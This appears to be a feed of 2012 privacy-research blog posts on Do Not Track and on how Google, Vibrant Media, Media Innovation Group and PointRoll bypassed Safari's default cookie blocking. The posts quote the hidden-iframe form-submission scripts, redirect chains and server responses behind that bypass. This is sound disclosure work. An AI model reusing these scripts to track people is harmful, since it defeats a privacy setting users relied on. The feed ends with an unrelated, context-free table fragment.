We envisioned a [Do Not Track] mechanism that would . . . allow consumers to limit how much data is gathered about them online (and not just how many targeted ads they see) . . . .

At present, online advertising self-regulation only stops behavioral ad targeting. (Some stakeholders have termed the program “Do Not Target.”)

For the past several years, the online advertising industry has been working to develop an icon that consumers could click to opt out of receiving targeted ads.

A consumer’s Do Not Track preference must affect all third-party websites, including advertising companies, analytics services, and social networks.

While these developments are encouraging, we still need to ensure that all companies that track users – not just advertisers – are at the table.

The World Wide Web Consortium is the multi-stakeholder forum for establishing Do Not Track technology and policy.

To that end, the World Wide Web Consortium (W3C), an Internet standards-setting body, gathered engineers, consumer groups, and participants across the broad technology industry to create a universal standard for Do Not Track. We look forward to their deliberations also bearing fruit over the coming year.

The FTC will continue to enforce on web tracking issues, especially when a company violates a consent order with the agency.

Today, although it is still a work in progress, the ad industry has obtained buy-in from companies that deliver 90 percent of online behavioral advertisements; and, with the Better Business Bureau, it has established a mechanism with teeth to address non-compliance, backed up with FTC enforcement. Said differently, if they don’t enforce it, we will.

Most notably, last year, two of the largest Internet companies entered into consent orders with the FTC that require both to honor their privacy commitments to hundreds of millions of consumers worldwide and to hire outside auditors to monitor their privacy practices.

The Do Not Track technology is the “DNT: 1” preference signaling mechanism, and consumers are already using it. Microsoft’s Tracking Protection List technology has merit, but it’s a different proposal.

In a related effort, very early on the companies that make web browsers stepped up to our challenge to give consumers choice about how they are tracked online, sometimes known as the browser header approach. Just after the FTC’s call for Do Not Track, Microsoft developed a system to let users of Internet Explorer prevent tracking by different companies and sites. Mozilla introduced a Do Not Track privacy control for its Firefox browser that an impressive number of consumers have adopted; Apple included a similar Do Not Track control in Safari.

Implications

European policymakers have already articulated their positions on advertising self-regulation and Do Not Track. In December the European Union’s Data Protection Working Party issued a formal opinion that found current advertising self-regulation inadequate under EU privacy law and that signaled support for the W3C’s Do Not Track standards process. European Commission Vice-President Neelie Kroes indicated in January that she shares those views; she reaffirmed her position in response to last week’s event.

Now the head of the chief U.S. consumer protection agency has chimed in, and he agrees. The FTC’s upcoming report on consumer privacy online will clarify where the other commissioners stand.

There is an increasingly clear transatlantic consensus: online advertising self-regulation is not enough. The W3C’s Do Not Track standards process is the way forward for providing meaningful consumer choice about third-party web tracking.

Thanks to Ashkan Soltani, Chris Soghoian, and ★★★★★ for conversations that informed this post. Thanks also to Lee Tien for input on a draft. All views, especially wrong ones, are my own.

Setting the Record Straight on Google’s Safari Tracking

jonathan — Tue, 21 Feb 2012 05:52:46 +0000

Our recent research on Google’s circumvention of the Safari cookie blocking feature has led to some confusion, in part owing to the company’s statement in response (reproduced in its entirety below). This post is an attempt to elucidate the central issues. As with the original writeup, I aim for a neutral viewpoint in the interest of establishing a common factual understanding.

To begin, I’d like to lend some structure to ongoing policy discussions by unpacking the four business practices that are at issue.

Social advertising. Google is leveraging user account information to personalize its advertising on non-Google websites. To do that, Google now identifies its users when they view ads on non-Google websites.

Social advertising circumvention. Google intentionally bypassed Safari’s cookie blocking feature to place an identifying cookie that it uses for social advertising.

Ordinary advertising circumvention. Google’s social circumvention had a collateral effect: it enabled Google to place its ordinary advertising tracking cookie.

Representation. A Google instructional webpage claimed that Safari’s cookie blocking feature “effectively accomplishes the same thing” as opting out of Google’s advertising cookies.

Safari Advertising Cookie Opt-Out Instructions

I’d next like to clarify some key points about our findings.

No account, login, or user preference was required for circumvention. The circumvention behaviors affected all users, independent of whether they had a Google account, were logged into a Google account, or had made a choice about social advertising.

Identifying and identifiable information was collected. Google’s social advertising technology is designed to identify the user—that’s how it shows your friends’ pictures! Google’s design document provides additional detail on the feature. For discussion of how third-party web tracking is in general not anonymous, see Arvind Narayanan‘s explanation “There is no such thing as anonymous web tracking” and our research on identifying information leakage.

Circumvention is not a commonly accepted business practice. We only identified four advertising companies that deployed technology for circumventing Safari’s cookie blocking, and all have since stopped the practice. Furthermore, a self-regulatory organization for the online advertising industry cites Safari’s cookie blocking feature as a way to stop cookies from advertising companies: “[Safari’s] default setting will block all third-party cookies, including those of our member ad networks and those of other, non-member ad networks.”

Apple’s intent was to block advertising-related tracking. The language in Safari’s preferences menu, Apple’s promotional materials, and developer discussions all indicate that advertising-related tracking was a central motivation for the cookie blocking feature.

Apple’s purpose was not messing with Google. The default cookie blocking feature that Google circumvented was implemented in Safari 1.0, which shipped in 2003—long before Google was in the third-party display advertising business, and long before relations between the companies soured over smartphones. Furthermore, Safari has repeatedly been a pioneer in browser privacy. Safari 1.0 included a simple “privacy reset” choice for clearing browser settings; the other major browsers followed with similar features. Safari 2.0, released in 2005, was the first browser to provide a “private browsing” mode; again, all the other major browsers followed.

No +1 button was visible on circumvention ads. We never saw an ad with the +1 button in our testing. The circumvention behaviors occurred in ordinary-looking ads. In the special case of YouTube’s homepage, there was no visible ad at all.

Circumvention was not needed for social sharing. Google’s circumvention was not necessary to make the +1 button clickable. (For the geeks in the audience: Google could have trivially routed clicks through google.com.) The circumvention was only needed¹ to personalize ads—for example, to show friends’ pictures near the +1 button, or in future to target ads based on Google+ social networking data.

Users likely did not understand their social advertising setting. New users are by default opted into social advertising on signup.

Social Advertising Default on Account Signup

My understanding is that users with accounts predating the +1 button have social advertising disabled, but are eventually prompted about the setting with “Enable” selected by default. Disabling the feature requires going to Accounts → Google+, locating the buried “+1 on non-Google sites” setting, then toggling it to “Disable”. Google’s description of the feature does not clearly communicate that it allows Google to identify the user on non-Google websites. The description also does not indicate that the feature would override a browser privacy setting.

Social Advertising Opt-Out Location

Social Advertising Opt-Out Page

Google’s circumvention only affected Google services. It did not allow other advertising companies to track the user.

Finally, I’d like to note a couple questions that remain open for Google.

Users impacted. Our measurement data suggests a great number of Safari users may have been affected by Google’s circumvention. Google has not yet indicated how many users were impacted.

Profit. Google held an advantage over its advertising competitors that did not track Safari browsers. That advantage may have resulted in profit. Google has not yet publicized an estimate of its income from tracking Safari browsers.

Google circulated the following statement to media outlets and policymakers on Friday. The company did not post the statement on its website, and my understanding is that Google representatives declined to answer questions about the statement.

The Journal mischaracterizes what happened and why. We used known Safari functionality to provide features that signed-in Google users had enabled. It’s important to stress that these advertising cookies do not collect personal information.

Unlike other major browsers, Apple’s Safari browser blocks third-party cookies by default. However, Safari enables many web features for its users that rely on third parties and third-party cookies, such as “Like” buttons. Last year, we began using this functionality to enable features for signed-in Google users on Safari who had opted to see personalized ads and other content–such as the ability to “+1” things that interest them.

To enable these features, we created a temporary communication link between Safari browsers and Google’s servers, so that we could ascertain whether Safari users were also signed into Google, and had opted for this type of personalization. But we designed this so that the information passing between the user’s Safari browser and Google’s servers was anonymous–effectively creating a barrier between their personal information and the web content they browse.

However, the Safari browser contained functionality that then enabled other Google advertising cookies to be set on the browser. We didn’t anticipate that this would happen, and we have now started removing these advertising cookies from Safari browsers. It’s important to stress that, just as on other browsers, these advertising cookies do not collect personal information.

Users of Internet Explorer, Firefox and Chrome were not affected. Nor were users of any browser (including Safari) who have opted out of our interest-based advertising program using Google’s Ads Preferences Manager.

Thanks to Arvind Narayanan, Ashkan Soltani, Lee Tien, and ★★★★★ for valuable input.

1. This discussion presumes Google would host its social advertising from doubleclick.net instead of google.com. If Google hosted social advertising from google.com there would have been no need to circumvent Safari’s cookie blocking.

Safari Trackers

jonathan — Fri, 17 Feb 2012 10:30:13 +0000

Apple’s Safari web browser is configured to block third-party cookies by default. We identified four advertising companies that unexpectedly place trackable cookies in Safari. Google and Vibrant Media intentionally circumvent Safari’s privacy feature. Media Innovation Group and PointRoll serve scripts that appear to be derived from circumvention example code.

In the interest of clearly establishing facts on the ground, this post provides technical analysis of Safari’s cookie blocking feature and the four companies’ practices. It does not address policy or legal issues. (More on that soon.)

Before proceeding further, I want to thank the countless friends and colleagues who provided invaluable feedback on this project. In particular: ★★★★★, whose insights have been vital at every step, and Ashkan Soltani, whose crawling data was instrumental in uncovering PointRoll’s practices and understanding the prevalence of cookie blocking circumvention.

Third-Party Cookie Blocking in Safari

Every popular web browser, save Opera Mini and the Android built-in browser, includes a “third-party cookie blocking” privacy feature. (The remainder of this post uses the term “cookie blocking” for brevity.) These options share a common high-level purpose: impose limits on cookies from “third-party domains,” that is, domains that differ from the “first-party domain” in the browser’s URL bar. In practice, however, implementations vary substantially; for (slightly out-of-date) specifics, see the Center for Democracy and Technology’s 2010 Browser Privacy Features report and Google’s Browser Security Handbook.

Safari’s cookie blocking feature is unique in two ways: its default and its substantive policy.

Unlike every other browser vendor, Apple enables cookie blocking by default. Every iPhone, iPad, iPod Touch, and Mac ships with the privacy feature turned on.

Default Privacy Settings in Desktop Safari

Default Privacy Settings in iPhone and iPad Safari

Apple advertises cookie blocking by default as a benefit of choosing Safari.

Some companies track the cookies generated by the websites you visit, so they can gather and sell information about your web activity. Safari is the first browser that blocks these tracking cookies by default, better protecting your privacy. Safari accepts cookies only from the current domain.

Apple’s cookie blocking policy is less restrictive than many competing browser vendors’.¹

Reading Cookies Safari allows third-party domains to read cookies.

Modifying Cookies If an HTTP request to a third-party domain includes a cookie, Safari allows the response to write cookies.

Form Submission If an HTTP request to a third-party domain is caused by the submission of an HTML form, Safari allows the response to write cookies. This component of the policy was removed from WebKit, the open source browser behind Safari, seven months ago by Google engineers. Their rationale is not public; the bug is marked as a security problem. The change has not yet landed in Safari.

These allowances in the Safari cookie blocking policy enable three potentially undesirable behaviors by advertising networks, analytics services, social widgets, and other “third-party websites.”

If a company operates both a first-party website and a third-party website from the same domain, visitors to the first-party website will be open to cookie-based tracking by the third-party service. Yahoo! is an example: it hosts both first-party websites and third-party advertising services on the yahoo.com domain.

If a third-party website’s content ever manages to load in a full browser window, the website can set cookies on its domain. An advertising company, for example, could set tracking cookies on its domain with a pop-up, pop-under, or temporary redirect (e.g. when a user clicks an ad).

A third-party website can use JavaScript to submit a form in an iframe without user interaction.

This post focuses on the last behavior. We discovered four advertising companies that surreptitiously submit a form in an invisible iframe and place trackable cookies in Safari: Google, Vibrant Media, Media Innovation Group, and PointRoll. The balance of the post details each company’s business practices.

Google

Google has, historically, operated most of its first-party websites on the google.com domain and most of its third-party services on other domains. For example: Google Analytics is served from google-analytics.com, Google software libraries are hosted at googleapis.com, Google static content is at gstatic.com, and Google’s advertising services are on doubleclick.net.

Separating first-party websites from third-party services improves security: interactions between google.com content and other websites could introduce vulnerabilities. The domain separation also benefits user privacy: Google associates user account information with google.com cookies. By serving its third-party services from other domains, Google ensures it will not receive google.com cookies, and therefore will not be able to trivially identify user activities on other websites.

But what about when Google does want to identify the user on a non-Google website? Social personalization requires² just that! Google has two design options.

First, Google could embed google.com content on non-Google websites. This is the approach it has taken with its social sharing widgets; both the (defunct) Buzz button and the +1 button load resources from google.com.

Second, Google could synchronize information from its google.com domain to another domain, a process called “cookie syncing” in online advertising lingo. This is the approach Google took with youtube.com after it acquired YouTube. And this is the approach Google settled on for social personalization of doubleclick.net display advertising. Google announced the +1 button for display ads last September; here are the steps in the underlying cookie syncing technology, based on conversations with Googlers and an explanatory document that Google provided.

A display advertisement includes the cookie syncing mechanism’s iframe, located at http://googleads.g.doubleclick.net/pagead/drt/s. We observed the iframe load in both desktop and mobile display ads. Here are example ads that included the mechanism, from the Washington Post (Safari on Mac OS X) and MSNBC (Safari on iPhone).

Google Ads Including the google.com → doubleclick.net Cookie Syncing Mechanism

We also saw what appeared to be a special use of the mechanism on youtube.com, where Google placed an invisible advertisement in the footer that included the cookie syncing iframe.

In a FourthParty crawl of the homepages of the Alexa U.S. top 500 websites, we detected the cookie syncing mechanism on 39 pages. This figure likely underestimates the prevalence of Google’s cookie syncing code since many websites show less advertising on their homepage. We observed the mechanism on New York Times and MSNBC article pages, for example, but not on their homepages.

The iframe loads a page that contains a meta refresh to http://google.com/pagead/drt/ui.

Apologies for any overflow; here and throughout the post I err on the side of preserving original formatting.

The response at http://google.com/pagead/drt/ui depends on whether the user is logged into Google. If the user is not logged in, the response includes a Location header that directs the browser back to googleads.g.doubleclick.net with some information in the p and ut parameters of the Request-URI.

Location: https://googleads.g.doubleclick.net/pagead/drt/si?p=CAA&ut=AFAKxlQAAAAATzuSTM-wZva6TmRV_FF7YdF2nggZfnlI

If the user is logged in, the response directs the user to Google’s authentication service.

Location: https://accounts.google.com/ServiceLogin?service=doritos&passive=true&go=true&continue=https://googleads.g.doubleclick.net/pagead/drt/si?p=CAEY9cLA-gQ&ut=AFAKxlQAAAAATz2v-fyl5V0PcBdEsvg95beKTozmJSql

The authentication service then directs the user back to googleads.g.doubleclick.net.

(A quick explanation of the “Doritos” reference—as I understand it, that’s Google’s internal codename for social personalization of third-party display advertising.)

location:https://googleads.g.doubleclick.net/pagead/drt/si?p=CAEY9cLA-gQ&ut=AFAKxlQAAAAATz2v-fyl5V0PcBdEsvg95beKTozmJSql&pli=1&auth=DQAAAIUAAAAPNIlph4K8ZDuUPlslr38CnSgqvc7E26I5RwkOrDDU7r81Q8H6iVYltrf4TEcE1haR9gSXQuARTXXHSWIW6EnmOyb2inWlPm28lprT6Hmkhn_PzhpuYlNUrSFZ9RdOAdro-hHVwMHQojKjOSSkQxQIIvetbMiMIOTcK88Ltq7Td9rQHLHJ_QrNb7EDz727XUM

Google’s documentation suggests that the p and ut parameters include an encryption of the user’s login state and, if logged in, account ID. (The Google design document makes a number of technical claims about how the syncing mechanism preserves user privacy. This post does not address those claims.)

In a browser other than Safari, the response sets a “_drt_” social personalization cookie on .doubleclick.net. If the user is not logged into Google, the cookie’s value is “NO_DATA”, and the cookie is set to expire in 12 hours.

set-cookie:_drt_=NO_DATA; expires=Fri, 17-Feb-2012 13:37:41 GMT; path=/; domain=.doubleclick.net; HttpOnly

If the user is logged into Google, the “_drt_” cookie contains an encryption of the user’s Google account ID, set to expire in 24 hours.

set-cookie:_drt_=AFkicjesF-jVECSOLRa1a-hf14FYVKIPEu4goDlxZZdVaxh1D4gDfJ6dvZg7Evnr2C8MluBSk6Nkr8TfL1ksojSb8qsjYHSNMQ; expires=Sat, 18-Feb-2012 01:25:10 GMT; path=/; domain=.doubleclick.net; HttpOnly

My understanding is that the cookie expirations are set to limit syncing frequency. If the user was not logged in at last sync, a sync will not be attempted for at least 12 hours; if the user was logged in, a sync will not be attempted for at least 24 hours.

In early testing, we a noticed a “PREF” cookie was sometimes set at the same time as the “_drt_” cookie.

set-cookie:PREF=ID=5a7be344032983bc:TM=1325643281:LM=1325643281:S=-BWpqDzbE7gq8rg-; expires=Fri, 03-Jan-2014 02:14:41 GMT; path=/; domain=googleads.g.doubleclick.net

The behavior appeared to stop before we contacted Google about our findings. We have not received information from Google explaining the “PREF” cookie on googleads.g.doubleclick.net. It appears to have the same format as the “PREF” cookie on google.com and the same two-year expiration.

So far, a (relatively) straightforward cookie syncing mechanism. But we noticed a special response at the last step for Safari browsers. We tested 400 User-Agent strings to verify that this is a special case; a spreadsheet of results is available.

Instead of responding with the “_drt_” cookie, the server sends back a page that includes a form and JavaScript to submit the form (using POST) to its own URL.

The response to the form submission then includes the Set-Cookie header for the “_drt_” cookie.

Recall that if a cookie is sent with an HTTP request, Safari’s blocking policy will allow the response to write cookies. Owing to the “_drt_” cookie, all doubleclick.net content is now immunized from Safari’s cookie blocking policy. The next time Google advertising content attempts to install the “id” tracking cookie for .doubleclick.net, it will successfully set. That next attempt may not even require that the user visit another page: We noticed that many Google ads periodically send requests to doubleclick.net, especially to a URL with the base http://ad.doubleclick.net/activity. A response to one of these requests can include a Set-Cookie header for the “test_cookie” cookie, which Google uses to make sure cookies successfully set (presumably to avoid wasting IDs and associated resources). A response to a subsequent request may then include a Set-Cookie header for the “id” cookie.

We confirmed that Google’s doubleclick.net “id” cookie was functioning in Safari by observing behavioral interest categories appear in Google Ads Preferences. Here is an example set of inferred interests after browsing the New York Times website.

Google Ads Preferences in a Fresh Instance of Safari After Browsing the New York Times

Vibrant Media

Vibrant Media is a contextual advertising network that primarily offers in-text and display advertising. We found conclusive evidence that Vibrant deliberately circumvents Safari’s third-party cookie blocking feature: one of the URLs involved in the circumvention is for the resource /safari.jsp. The following steps describe the circumvention technology as deployed on answers.com. We observed identical behavior at the various region-specific subdomains of cbslocal.com.

Vibrant’s main advertising script loads from http://answers.us.intellitxt.com/intellitxt/front.asp?ipid=31690. When the browser has a Safari User-Agent string and no Vibrant cookie, the script includes this code:

(function() {try {var e=document.createElement('iframe');e.style.display='none';e.src='http://answers.us.intellitxt.com/safari.jsp?t='+(new Date()).getTime();var b=document.getElementsByTagName('body')[0];b.insertBefore(e,b.firstChild);}catch(x){}})();

The Safari-specific code executes, adding an invisible iframe to the page.

The Request-URI parameter t is the current time in milliseconds, presumably used to prevent caching.

The iframe contains a form and a body onload handler that submits the form.

The response to the form contains no content and an instruction to set a Vibrant ID cookie.

Set-Cookie: VM_USR=AG75nlrejUwdiE6n3+naS1YAADwZAAA8VQEAAAE1gRigFAA-; Domain=.intellitxt.com; Expires=[now + 2 months]; Path=/

The Request-URI parameter x=1 appears to control whether the response includes the form page or a Set-Cookie header.

We confirmed that the “VM_USR” cookie is a Vibrant ID by checking the Network Advertising Initiative‘s cookie status page.

Active Vibrant Media Cookie Status Indicator

We verified that the NAI indicator is based on the presence of a valid “VM_USR” cookie, not the presence of any cookie or any “VM_USR” cookie.

Media Innovation Group

Media Innovation Group (MIG) is an advertising technology provider within the WPP family of companies. MIG’s “Zeus Advertising Platform” (ZAP) is WPP’s “integrated advertising and analytics platform”. According to a report from a vendor, ZAP “is one of the cornerstone products created by MIG” that “provides a holistic view of site analytics and campaign data for a comprehensive understanding of every individual consumer.” ZAP “collects and stores over 13 months of historical user-level data and draws from it to provide complex and robust analysis.” With ZAP, “MIG is currently tracking the effectiveness of every single advertising element within many live campaigns that reach hundreds of millions of unique users per month . . . .”

We found that some MIG advertising content included a script that circumvents Safari’s cookie blocking feature. Here is the relevant part of one such script we discovered at http://b3.mookie1.com/2/B3DM/DLX/1672705484@x71. A few clarifying notes: mookie1.com is a MIG domain (go figure), is_http stores whether the content is loaded over HTTP, and ZAP_id stores the “id” cookie.

if(is_http) { if(ZAP_id.indexOf(':') != -1 || ZAP_id == '') { var firstTimeSession = 0; function submitSessionForm() { if (firstTimeSession == 0) { firstTimeSession = 1; $("#sessionform").submit(); //setTimeout(processApplication(),2000); } } $("body").append('
'); function processApplication() { } }

The script creates an invisible iframe and form, then submits the form into the iframe during the onload handler for the iframe.

In response to the form submission, MIG sets cookies and redirects to a 1×1 GIF.

$ curl -i -L -X POST "http://t.mookie1.com/t/v1/imp?" HTTP/1.1 302 Found Date: Fri, 17 Feb 2012 09:48:03 GMT Server: Apache/2.0.52 (Red Hat) Cache-Control: no-cache Pragma: no-cache P3P: CP="NOI DSP COR NID CUR OUR NOR" Set-Cookie: id=3025894295853070; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com Set-Cookie: mdata=1|3025894295853070|1329472083; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com Set-Cookie: OAX=nVuS508+IlMACEDl; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com Location: /t/v1/imp/cc? Content-Length: 277 Connection: close Content-Type: text/html; charset=iso-8859-1 HTTP/1.1 200 OK Date: Fri, 17 Feb 2012 09:48:03 GMT Server: Apache/2.0.52 (Red Hat) Cache-Control: no-cache Pragma: no-cache P3P: CP="NOI DSP COR NID CUR OUR NOR" Set-Cookie: id=914844815541839; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com Set-Cookie: mdata=1|914844815541839|1329472083; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com Set-Cookie: OAX=T6AK5U8+IlMACoIB; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com Content-Length: 35 Connection: close Content-Type: image/gif GIF87a???????,D;

Comments in MIG’s script indicate that “id” is the ZAP ID cookie and “OAX” is the ID cookie for WPP’s B3 advertising optimization and custom marketplace product. We verified that the script sets a tracking cookie with MIG’s NAI status indicator.

MIG’s circumvention code appeared (relatively) infrequently; our crawl of the Alexa U.S. top 500 homepages located it on five sites. It is unclear whether MIG served this script only to Safari users. While we did not see the MIG code in any non-Safari browsers, that may have been due to insufficient sample size; we were not able to reliably cause the MIG code to appear.

That said, we believe it is nevertheless reasonable to infer that MIG’s circumvention was intentional. MIG’s code appears to be based on widely-cited sample code by web developer Anant Garg. Even Facebook’s developer documentation points to the sample.

var isSafari = (/Safari/.test(navigator.userAgent)); var firstTimeSession = 0; function submitSessionForm() { if (firstTimeSession == 0) { firstTimeSession = 1; $("#sessionform").submit(); setTimeout(processApplication(),2000); } } if (isSafari) { $("body").append('
'); } else { processApplication(); } function processApplication() { alert('Session has been set. Now you can start your application!'); }

The resemblance is uncanny. The scripts share the exact same variable names, structure, logic, and library dependency (jQuery 1.3.2 on Google Libraries). Even more compelling, MIG commented out a line that it didn’t need!

PointRoll

PointRoll is a rich media advertising company owned by Gannett. PointRoll’s corporate website claims that it “[p]ower[s] 55% of all rich media campaigns online” and “serv[es] over 450 billion impressions for more than two-thirds of the Fortune 500 brands . . . .”

We found that a PointRoll cookie helper script circumvents Safari’s cookie blocking. One instance of the script we studied is at http://ads.pointroll.com/PortalServe/?pid=1574300Y14520120126002933&flash=11&time=4|13:53|-8&redir=http://at.atwola.com/adlink/5113/2209587/0/2392/AdId=2327012;BnId=1;itime=219618215;nodecode=yes;link=$CTURL$&pos=s&postal=94305&r=0.18630846054557448.

Here’s the relevant part of the script. Unlike the other examples, this code was passed through a formatter—it’s otherwise unreadable.

function submitSessionForm(name) { var sessionForm = document.getElementById(name); if (typeof (sessionForm) != 'undefined') { var txtStatus = document.getElementById('txt_' + name); if (txtStatus.value == 'UNSUBMITTED') { txtStatus.value = 'SUBMITTED'; console.log("form " + name + " Submitted"); sessionForm.submit(); } } } function prCook(name, value, date, dom) { console.log("add form: name=" + name + ": value=" + value + ": date=" + date + ": dom=" + dom); var date = (typeof (date) != "undefined") ? date : "Fri, 14-Feb-2014 14:47:07 GMT"; var dom = (typeof (dom) != "undefined") ? dom : "ads.pointroll.com"; var sCook = ''; sCook += '
'; sCook += ''; sCook += ''; sCook += ''; sCook += ''; sCook += ''; sCook += '
'; var d = document.createElement('DIV'), p = document.getElementsByTagName('BODY'); d.innerHTML = sCook; if (p.length < 1) { p = document.getElementsByTagName('HTML'); } p[0].appendChild(d);

The script provides a cookie setting function, prCook. When called, the function creates a new div and places within it an invisible iframe and form with the cookie fields specified by the input parameters. An onload handler on the iframe submits the form into the iframe. For example, the call

prCook('example_cookie_name', 'example_cookie_value', 'Fri, 14-Feb-2014 14:47:07 GMT', 'exampledomain.com')

would result in this code being added in a new div element:

Here is the response when the form is submitted.

$ curl -i "http://ads.pointroll.com/clients/pointroll/cookie/drop.ashx?name=example_cookie_name&date=Fri%2C%2014-Feb-2014%2014%3A47%3A07%20GMT&value=example_cookie_value&domain=exampledomain.com" HTTP/1.1 200 OK Connection: close Date: Fri, 17 Feb 2012 07:41:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Access-Control-Allow-Origin: * X-AspNet-Version: 2.0.50727 Pragma: no-cache p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: example_cookie_name=example_cookie_value; domain=exampledomain.com; expires=Fri, 14-Feb-2014 14:47:07 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 145

Information	Current Approach	Better Approach	Even Better Approach
Webpage	URL	Fully qualified domain name	Public suffix + 1
Time	Precise timestamp	Day	Week
User Location	IP address	Truncated IP address	Coarse geolocation
Browser	`User-Agent` string	Browser/OS major versions	Browser/OS